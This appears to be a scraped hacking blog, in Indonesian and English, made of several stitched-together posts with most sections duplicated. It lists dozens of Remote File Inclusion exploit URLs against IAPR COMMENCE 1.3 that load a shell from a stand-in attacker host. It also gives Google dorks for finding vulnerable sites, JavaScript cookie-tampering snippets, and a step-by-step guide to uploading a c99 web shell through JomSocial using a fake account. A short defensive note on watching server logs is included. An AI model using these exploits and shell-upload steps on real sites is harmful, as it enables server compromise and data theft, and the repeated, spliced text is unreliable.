Pada kesempatan kali ini penulis akan memberikan sebuah contoh penyerangan dengan menggunakan teknik Remote File Inclusion. Yang akan penulis jadikan target pada contoh kali ini adalah IAPR COMMENCE Versi 1.3. Pada IAPR COMMENCE Versi 1.3 ini banyak sekali halaman yang tidak terfilter dengan baik sehingga bisa dimanfaatkan oleh penyerang untuk melakukan serangan dengan menggunakan teknik Multiple Remote File Inclusion. Halaman-halaman beserta exploitasinya sebagai berikut :
http://target.com/Commence/includes/
db_connect.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
main_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
output_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
user_authen_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
page.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
TINGKAT BAHAYA
————–
Serangan Remote File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.
APA YANG HARUS DILAKUKAN
————————-
Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.
Artikel diatas penulis tulis berdasarkan pengetahuan yang penulis miliki, apabila terdapat kesalahan dimohon masukan dan pencerahannya.
Referensi:
http://www.milw0rm.com
Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.
MENGAPA BISA TERJADI?
———————-
Sebuah serangan Remote File Inclusion terjadi berdasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:
1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)
Variabel dalam PHP mempunyai sintaks:
include ($namavariable. “/file…”)
require_once ($namavariable. /file…)
include_once ($variable. /file…)
Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel
seperti ini:
…
include($my_ms[”root”].’/error.php’);
…
Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit
script PHP Incetion:
http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?
2. Setting dalam file PHP.ini
register_globals=On
magic_quotes=off
allow_fopenurl=on
CONTOH SERANGAN DENGAN MENGGUNAKAN TEKNIK RFI
———————————————
Pada kesempatan kali ini penulis akan memberikan sebuah contoh penyerangan dengan menggunakan teknik Remote File Inclusion. Yang akan penulis jadikan target pada contoh kali ini adalah IAPR COMMENCE Versi 1.3. Pada IAPR COMMENCE Versi 1.3 ini banyak sekali halaman yang tidak terfilter dengan baik sehingga bisa dimanfaatkan oleh penyerang untuk melakukan serangan dengan menggunakan teknik Multiple Remote File Inclusion. Halaman-halaman beserta exploitasinya sebagai berikut :
http://target.com/Commence/includes/
db_connect.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
main_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
output_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
user_authen_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
page.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
TINGKAT BAHAYA
————–
Serangan Remote File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.
APA YANG HARUS DILAKUKAN
————————-
Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.
Artikel diatas penulis tulis berdasarkan pengetahuan yang penulis miliki, apabila terdapat kesalahan dimohon masukan dan pencerahannya.
Referensi:
http://www.milw0rm.com
Asset Manager :Shell and Files upload Vulnerability
Asset Manager :Shell and Files upload Vulnerability
Google Dork : "inurl:Editor/assetmanager/assetmanager.asp"Open Google.com/ncr and enetr this dork
"inurl:Editor/assetmanager/assetmanager.asp"
Now Open any site from search results
Now You will Got a Page Like That
Google Dork : "inurl:Editor/assetmanager/assetmanager.asp"Open Google.com/ncr and enetr this dork
"inurl:Editor/assetmanager/assetmanager.asp"
Now Open any site from search results
Now You will Got a Page Like That
| |||
Javascript Killer Javascript Injection : Fun with Javascripts
javascript Injection is Similar to CSRF vulnerability ,
its just for fun, but sometimes you can get cookies of vulnerable website by using Javascript injection,
Take a Look of javascript injection
[Note : working in Firefox Only]
Alert and Changing Title on Website
Javascript: alert(document.title = "title name");
You can Chnage Title of website by putting this script in you browser
and you'll get a Alert too ..
Message On website on alert Box
Javascript: alert("you message here");
use this script for more than one message
javascript: alert("First message"); alert("second message"); alert("Third message");

you can show you message on website by putting this script on browser URL box
Getting Cookies By javascripts
you can use these scripts to get and chnage cookies of website

alert(document.cookie);
javascript:void(document.cookie="Cookie_name=Cookie_value");
javascript:void(document.cookie="username=user123"); alert(document.cookie);
javascript:void(document.cookie="username=user123"); void(document.cookie="password=pass123"); alert(document.cookie);
its just for fun, but sometimes you can get cookies of vulnerable website by using Javascript injection,
Take a Look of javascript injection
[Note : working in Firefox Only]
Alert and Changing Title on Website
Javascript: alert(document.title = "title name");
You can Chnage Title of website by putting this script in you browser
and you'll get a Alert too ..
Message On website on alert Box
Javascript: alert("you message here");
use this script for more than one message
javascript: alert("First message"); alert("second message"); alert("Third message");

you can show you message on website by putting this script on browser URL box
Getting Cookies By javascripts
you can use these scripts to get and chnage cookies of website

alert(document.cookie);
javascript:void(document.cookie="Cookie_name=Cookie_value");
javascript:void(document.cookie="username=user123"); alert(document.cookie);
javascript:void(document.cookie="username=user123"); void(document.cookie="password=pass123"); alert(document.cookie);
JomSocial ~ Joomla Shell Upload Vulnerability
Stuff you need:
Firefox
A Shell
Tamper Data
Vulnerable Site
& a Brain :)
Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*
Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos
Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. "myshell")
3. Copy the shell to the same folder and rename it to "yourshell.php.flv"
4. Now in your folder you have 2 files, "myshell.php" & "myshell.php.flv".
Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.
Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.
The reason for having created a file called "myshell.php.flv", is to trick the uploader into thinking that you are uploading a FLV file.
Uploading shell:
1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your "myshell.php.flv".
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for "myshell.php.flv" then delete the .flv part meaning you will have "myshell.php" left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.
Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your "random.php"
6. And your IN!
Firefox
A Shell
Tamper Data
Vulnerable Site
& a Brain :)
Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*
Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos
Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. "myshell")
3. Copy the shell to the same folder and rename it to "yourshell.php.flv"
4. Now in your folder you have 2 files, "myshell.php" & "myshell.php.flv".
Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.
Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.
The reason for having created a file called "myshell.php.flv", is to trick the uploader into thinking that you are uploading a FLV file.
Uploading shell:
1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your "myshell.php.flv".
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for "myshell.php.flv" then delete the .flv part meaning you will have "myshell.php" left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.
Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your "random.php"
6. And your IN!
Langganan:
Postingan (Atom)
"Custom Upload" Sql injection remote php shell upload vulnreblity
Google Dork : inurl:customupload.html Poc : fileupload.html Author : NoEntryPhc SQL injection vulnreblity : Goto Google.com and ...
-
paw is a Vunerablity, you Can Upload your deface & Shell Easily in Vunerable websites Lets Start open www.google.com enter T...
-
et's get started: Type: VP-ASP Shopping Cart Version: 5.00 How to find a VP-ASP 5.00 site? VP-ASP 5.00 Finding a site is very simple...
-
javascript Injection is Similar to CSRF vulnerability , its just for fun, but sometimes you can get cookies of vulnerable website by usin...

